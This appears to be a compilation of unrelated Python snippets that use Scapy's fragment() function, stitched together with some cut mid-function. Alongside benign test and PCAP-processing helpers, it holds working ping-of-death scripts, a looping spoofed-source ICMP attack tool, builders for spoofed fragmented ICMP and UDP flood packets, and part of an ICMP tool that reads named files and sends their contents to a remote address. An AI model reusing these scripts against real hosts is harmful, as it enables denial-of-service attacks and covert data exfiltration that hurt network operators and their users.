def run(self, hosts): # Send ICMP ping request, wait for answer for host in hosts: packet = fragment(IP(dst=str(host)) / ICMP()/("X"*60000)) resp = self.send_receive(packet, timeout=2, verbose=0)
def main(): parser = argparse.ArgumentParser( description='Fragments the IPv4 packets in the given PCAP file ' 'and writes the results to another file.') parser.add_argument('input_file') parser.add_argument('output_file') parser.add_argument( '--fragment-size', '-s', type=int, default=500, help='Fragment size. Packets larger than this are fragmented ' 'if their df flag is not set. Defaults to 500.') args = parser.parse_args() reader = RawPcapReader(args.input_file) writer = PcapWriter(args.output_file, append=False, sync=True) for pkt_data in reader: p = Ether(pkt_data[0]) if isinstance( p[1], IP) and len(p[2]) > args.fragment_size and p[1].flags & 2 != 0: p = fragment(p, args.fragment_size) print 'Fragmented packet into {} fragments.'.format(len(p)) writer.write(p)
def send_packet(packet): SourceMac = packet[Ether].src if SourceMac in macs: del packet[Ether].src del packet[IP].chksum packet[Ether].dst = macs[(macs.index(SourceMac) + 1) % 2] frags = fragment(packet) for f in frags: sendp(f, verbose=0)
def sendPerSecond(timestamp,ip,dataSize,mac,packets): # p=Ether(dst=mac)/IP(src=ip)/TCP()/''.zfill(dataSize); t=time(); p['IP'].src=ip; p2=fragment(p/''.zfill(dataSize)) print(str(size)+','+str(time()-t)) t=time(); packets.extend(p2); print(str(size)+','+str(time()-t)) t=time();
def generate_ip4_frags(self, payload_length, fragment_size): p_ether = Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) p_payload = UDP(sport=1234, dport=1234) / self.payload(payload_length) p_ip4 = IP(src="1.2.3.4", dst=self.pg0.remote_ip4) outer_ip4 = (p_ether / IP(src=self.pg1.remote_ip4, id=RandShort(), dst=self.pg0.local_ip4) / p_ip4 / p_payload) frags = fragment(outer_ip4, fragment_size) p4_reply = (p_ip4 / p_payload) p4_reply.ttl -= 1 return frags, p4_reply
def generate_ip4_frags(self, payload_length, fragment_size): p_ether = Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) p_payload = UDP(sport=1234, dport=1234) / self.payload(payload_length) p_ip4 = IP(src="1.2.3.4", dst=self.pg0.remote_ip4) outer_ip4 = (p_ether / IP( src=self.pg1.remote_ip4, id=RandShort(), dst=self.pg0.local_ip4) / p_ip4 / p_payload) frags = fragment(outer_ip4, fragment_size) p4_reply = (p_ip4 / p_payload) p4_reply.ttl -= 1 return frags, p4_reply
def build_fragmented_icmp_packet(destination_ip): """Generate fragmented ICMP packet with spoofed source IP address. Argument: destination_ip -- the IP address of the target """ return fragment( IP(src=RandIP(), dst=destination_ip, id=RandShort(), ttl=packet_builder.generate_ttl()) / ICMP(id=RandShort()) / packet_builder.generate_payload(min_count=1500, max_count=65500), fragsize=packet_builder.generate_fragsize())
def build_fragemneted_udp_packet(destination_ip, destination_port): """Generate fragmented UDP packet with random source port and spoofed source IP address. Arguments: destination_ip -- the IP address of the target destination_port -- the targets port to which the packet will be sent """ return fragment( IP(src=RandIP(), dst=destination_ip, id=RandShort(), ttl=packet_builder.generate_ttl()) / UDP(sport=RandShort(), dport=destination_port) / packet_builder.generate_payload(min_count=1500, max_count=65500), fragsize=packet_builder.generate_fragsize())
def send_packet(self, packet, **kwargs): """ If the destination is an IP just transfert it. If this is an DN try to get the IP otherwise put the packet in the pool and trigger a DNS request for the given DN """ if not kwargs.has_key("IP"): kwargs["IP"] = {} if not kwargs["IP"].has_key("id"): kwargs["IP"]['id'] = random.randrange(1, 65535) p = self.forge_packet(packet, **kwargs["IP"]) if len(p) > self.MTU: fragments = fragment(p, fragsize=self.MTU) for frag in fragments: self.transfer_packet(frag, **kwargs) else: self.transfer_packet(p, **kwargs) '''
def fragment(self, original, fragsize): """ Fragments a packet into two, given the size of the first packet (0:fragsize) Always returns two packets """ if fragsize == 0: frags = [original] else: frags = fragment(original, fragsize=fragsize) # If there were more than 2 fragments, join the loads so we still have 2 packets if len(frags) > 2: for frag in frags[2:]: frags[1]["IP"].load += frag["IP"].load # After scapy fragmentation, the flags field is set to "MF+DF" # In order for the packet to remain valid, strip out the "MF" frags[1]["IP"].flags = "DF" # If scapy tried to fragment but there were only enough bytes for 1 packet, just duplicate it elif len(frags) == 1: frags.append(frags[0].copy()) return frags[0], frags[1]
def Ping_attack(): clear = os.system('clear') print("**************************************") print(" Super ICMP_Attack") print("**************************************") print("please input your attack target's IP") target = input("[Super ICMP_attack]#") srcip = scapy.RandIP() attack_numbers=0 try: while True: packet = scapy.fragment(scapy.IP(src=srcip,dst=target)/scapy.ICMP()/("X"*2000)) scapy.send(packet,verbose=False) attack_numbers += 1 print("[+]Attack Number is "+str(attack_numbers)) time.sleep(2) except KeyboardInterrupt: print("[-]Ctrl + C detected.....")
def send(self, packet): original_packet = IP(dst=self.target_ip,src=self.return_ip)/UDP(dport=self.target_port,sport=self.return_port)/packet if self.verbose > 1: print "Original packet:" original_packet.show() hexdump(str(original_packet)) fragments = fragment(original_packet, fragsize = self.fragment_size) try: i = 1 for frag in fragments: if self.verbose > 1: print "Fragment %d of %d:" % (i, len(fragments)) frag.show() frag = str(frag) length = struct.pack(">I", len(frag)) if not self.sock: print '[+] connecting ...' self.sock = self.create() print '[+] sending part %d of %d now..' % (i, len(fragments)) hexdump(frag) if self.log: self.log.packet('sending fragment %d of %d' % (i, len(fragments)), frag) self.sock.send(length) self.sock.send(frag) if self.log: self.log('sent fragment %d of %d' % (i, len(fragments))) i += 1 if self.raw_send: if self.log: self.log('forcing a new connection due to raw_send flag') self.close() except KeyboardInterrupt,e: print "[-] keyboard interrupt while connecting/sending to redirector" raise KeyboardInterrupt,e
def run(self): print "death pinging " + self.ip send(fragment(IP(dst=self.ip) / ICMP() / ("V" * self.length)))
def sendPerSecond(timestamp, ip, dataSize, mac, packets): # p=Ether(dst=mac)/IP(src=ip)/TCP()/''.zfill(dataSize); packetPrototype['IP'].src = ip p2 = fragment(packetPrototype / ''.zfill(dataSize)) packets.extend(p2)
def POD(ip_addr, amt): send(fragment(IP(dst=ip_addr) / ICMP() / ("X" * int(amt)))) return 1
#!/usr/bin/python # This tool is for educational use only! # Description: Ping of death # Requirements: scapy + root privileges import sys from scapy.all import send, fragment, IP, ICMP if len(sys.argv) < 2: print "{0} <dst_ip>".format(sys.argv[0]) sys.exit(1) send(fragment(IP(dst=sys.argv[1]) / ICMP() / ("X" * 60000)))
#!/usr/bin/python # This tool is for educational use only! # Description: Ping of death # Requirements: scapy + root privileges import sys from scapy.all import send, fragment, IP, ICMP if len(sys.argv) < 2: print "{0} <dst_ip>".format(sys.argv[0]) sys.exit(1) send(fragment(IP(dst=sys.argv[1]) / ICMP() / ("X"*60000)))
infos = data[:6] filename = data[6:] dataUnpacked = unpack('IH',infos) offset = dataUnpacked[0] size = dataUnpacked[1] sys.stdout.write("Filename : " + filename + "\nOffset : " + str(offset) + "\n") try: f = open(filename) except: print "%s not found"%filename continue f.seek(offset) line = f.read(size) f.close() send(fragment(IP(dst=sys.argv[2]) / ICMP(type='echo-reply', id=ident, seq=seq_id) / (line))) except: if len(data) == 0: print "End" else: print "Invalid ICMP buffer" if __name__ == '__main__': if len(sys.argv) < 3: msg = 'missing mandatory options. Execute as root:\n' msg += './icmpsh_download_cli.py <source IP address> <destination IP address>\n' sys.stderr.write(msg) sys.exit(1) main(sys.argv[1], sys.argv[2])
def sendPerSecond(timestamp,ip,dataSize,mac,packets): # p=Ether(dst=mac)/IP(src=ip)/TCP()/''.zfill(dataSize); packetPrototype['IP'].src=ip; p2=fragment(packetPrototype/''.zfill(dataSize)); packets.extend(p2);